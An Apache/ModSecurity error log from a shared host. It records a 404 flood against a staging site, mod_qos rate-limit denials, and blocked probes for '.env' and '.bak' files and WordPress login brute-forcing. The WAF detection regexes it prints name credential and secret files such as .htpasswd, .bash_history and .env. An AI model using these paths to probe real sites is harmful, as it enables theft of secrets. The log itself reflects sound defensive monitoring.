[Tue May 26 19:55:16.334343 2026] [security2:error] [pid 93868:tid 94374] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SNAAAAgM"]
[Tue May 26 19:55:16.335606 2026] [security2:error] [pid 93868:tid 94283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SIwAAAag"]
[Tue May 26 19:55:16.348519 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SKAAAAf8"]
[Tue May 26 19:55:16.361809 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSmDRMqfxdEDkoszZCAAAACM"]
[Tue May 26 19:55:16.384762 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZOAAAAFA"]
[Tue May 26 19:55:16.393737 2026] [security2:error] [pid 93868:tid 94259] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SQAAAAZA"]
[Tue May 26 19:55:16.395832 2026] [security2:error] [pid 93576:tid 93779] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/config/test.bak"] [unique_id "ahWtTGDRMqfxdEDkoszZZQAAAEM"]
[Tue May 26 19:55:16.412149 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25SbwAAAas"]
[Tue May 26 19:55:16.421316 2026] [security2:error] [pid 93868:tid 94363] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SPAAAAfg"]
[Tue May 26 19:55:16.431883 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25ScAAAAfI"]
[Tue May 26 19:55:16.436239 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZPgAAACk"]
[Tue May 26 19:55:16.438123 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZNgAAAGE"]
[Tue May 26 19:55:16.439234 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25SeQAAAdk"]
[Tue May 26 19:55:16.442733 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZOwAAAC8"]
[Tue May 26 19:55:16.444635 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25SgQAAAeY"]
[Tue May 26 19:55:16.449973 2026] [security2:error] [pid 93868:tid 94272] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25SiQAAAZ0"]
[Tue May 26 19:55:16.451313 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25SiAAAAaY"]
[Tue May 26 19:55:16.451647 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZSQAAAFk"]
[Tue May 26 19:55:16.452456 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZOQAAAFo"]
[Tue May 26 19:55:16.616126 2026] [security2:error] [pid 93868:tid 94076] [remote 35.176.253.230:51766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.253.176.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtTEqK9k_ZUB2Vp25StQAB1Rw"]
[Tue May 26 19:55:17.072551 2026] [security2:error] [pid 93576:tid 93720] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/hrm-app/client/.env"] [unique_id "ahWtTWDRMqfxdEDkoszZbQAAAAg"]
[Tue May 26 19:55:17.200371 2026] [security2:error] [pid 93868:tid 94380] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtTUqK9k_ZUB2Vp25SywAAAgk"], referer: https://anujtradingco.com
[Tue May 26 19:55:17.278773 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZRQAAAGM"]
[Tue May 26 19:55:17.279809 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZTQAAAG8"]
[Tue May 26 19:55:17.283810 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZTgAAAAQ"]
[Tue May 26 19:55:17.289539 2026] [security2:error] [pid 93576:tid 93773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZQQAAAD0"]
[Tue May 26 19:55:17.293193 2026] [security2:error] [pid 93868:tid 94355] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25SfgAAAfA"]
[Tue May 26 19:55:17.293635 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZUQAAACI"]
[Tue May 26 19:55:17.294721 2026] [security2:error] [pid 93868:tid 94348] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25ScQAAAek"]
[Tue May 26 19:55:17.311747 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25SnQAAAec"]
[Tue May 26 19:55:17.314415 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZXAAAABE"]
[Tue May 26 19:55:17.325936 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTEqK9k_ZUB2Vp25SswAAAaU"]
[Tue May 26 19:55:17.326606 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZTAAAAA4"]
[Tue May 26 19:55:17.333867 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZWQAAADU"]
[Tue May 26 19:55:17.337434 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25ShgAAAf0"]
[Tue May 26 19:55:17.339838 2026] [security2:error] [pid 93868:tid 94353] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25SoAAAAe4"]
[Tue May 26 19:55:17.343942 2026] [security2:error] [pid 93868:tid 94316] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25SogAAAck"]
[Tue May 26 19:55:17.347061 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTUqK9k_ZUB2Vp25S1QAAAeg"]
[Tue May 26 19:55:17.347204 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS2DRMqfxdEDkoszZXQAAABU"]
[Tue May 26 19:55:17.350322 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTGDRMqfxdEDkoszZZgAAAH0"]
[Tue May 26 19:55:17.352188 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTEqK9k_ZUB2Vp25StAAAAeE"]
[Tue May 26 19:55:17.353840 2026] [security2:error] [pid 93868:tid 94376] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25SlwAAAgU"]
[Tue May 26 19:55:17.354690 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTUqK9k_ZUB2Vp25SyAAAAZ8"]
[Tue May 26 19:55:17.361378 2026] [security2:error] [pid 93868:tid 94321] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTUqK9k_ZUB2Vp25S1AAAAc4"]
[Tue May 26 19:55:17.363004 2026] [security2:error] [pid 93868:tid 94337] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTUqK9k_ZUB2Vp25S0gAAAd4"]
[Tue May 26 19:55:17.366974 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTGDRMqfxdEDkoszZZwAAABk"]
[Tue May 26 19:55:17.366997 2026] [security2:error] [pid 93868:tid 94283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTUqK9k_ZUB2Vp25SyQAAAag"]
[Tue May 26 19:55:17.383928 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTUqK9k_ZUB2Vp25S0wAAAb0"]
[Tue May 26 19:55:17.457864 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTWDRMqfxdEDkoszZeQAAAHw"]
[Tue May 26 19:55:17.570324 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTWDRMqfxdEDkoszZfgAAAHE"]
[Tue May 26 19:55:17.643497 2026] [security2:error] [pid 93576:tid 93828] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtTWDRMqfxdEDkoszZcgAAAHQ"]
[Tue May 26 19:55:17.864175 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTWDRMqfxdEDkoszZjAAAACk"]
[Tue May 26 19:55:17.864434 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTWDRMqfxdEDkoszZjQAAADo"]
[Tue May 26 19:55:17.864845 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTWDRMqfxdEDkoszZjgAAAH8"]
[Tue May 26 19:55:17.870344 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTWDRMqfxdEDkoszZjwAAAFw"]
[Tue May 26 19:55:17.969104 2026] [security2:error] [pid 93868:tid 94090] [remote 35.176.253.230:51766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.253.176.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtTUqK9k_ZUB2Vp25S4wABuyM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:55:18.050862 2026] [security2:error] [pid 93868:tid 94086] [remote 20.219.17.202:57064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.17.219.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWtTUqK9k_ZUB2Vp25S4gABqSE"]
[Tue May 26 19:55:18.143481 2026] [security2:error] [pid 93576:tid 93681] [remote 124.156.212.23:50603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtTWDRMqfxdEDkoszZkwAAR2Q"]
[Tue May 26 19:55:18.144922 2026] [security2:error] [pid 93868:tid 94291] [client 152.42.213.139:56768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.213.42.152.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-login.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25S5QAAAbA"], referer: https://www.google.com/
[Tue May 26 19:55:18.223401 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25S5wAAAgk"]
[Tue May 26 19:55:18.320553 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtTmDRMqfxdEDkoszZ-gAAAH8
[Tue May 26 19:55:18.320599 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtTmDRMqfxdEDkoszZ8gAAAEM
[Tue May 26 19:55:18.320993 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtTmDRMqfxdEDkoszZ_AAAADw
[Tue May 26 19:55:18.321184 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtTmDRMqfxdEDkoszZ-wAAAHE
[Tue May 26 19:55:18.324129 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtTmDRMqfxdEDkoszZ_QAAAC8
[Tue May 26 19:55:18.324270 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtTmDRMqfxdEDkoszZ_wAAAFc
[Tue May 26 19:55:18.329691 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25S_gAAAd0"]
[Tue May 26 19:55:18.338498 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TAAAAAdk"]
[Tue May 26 19:55:18.346755 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZqQAAAG8"]
[Tue May 26 19:55:18.358679 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TAQAAAec"]
[Tue May 26 19:55:18.358874 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25S_AAAAY8"]
[Tue May 26 19:55:18.362925 2026] [security2:error] [pid 93868:tid 94301] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TBQAAAbo"]
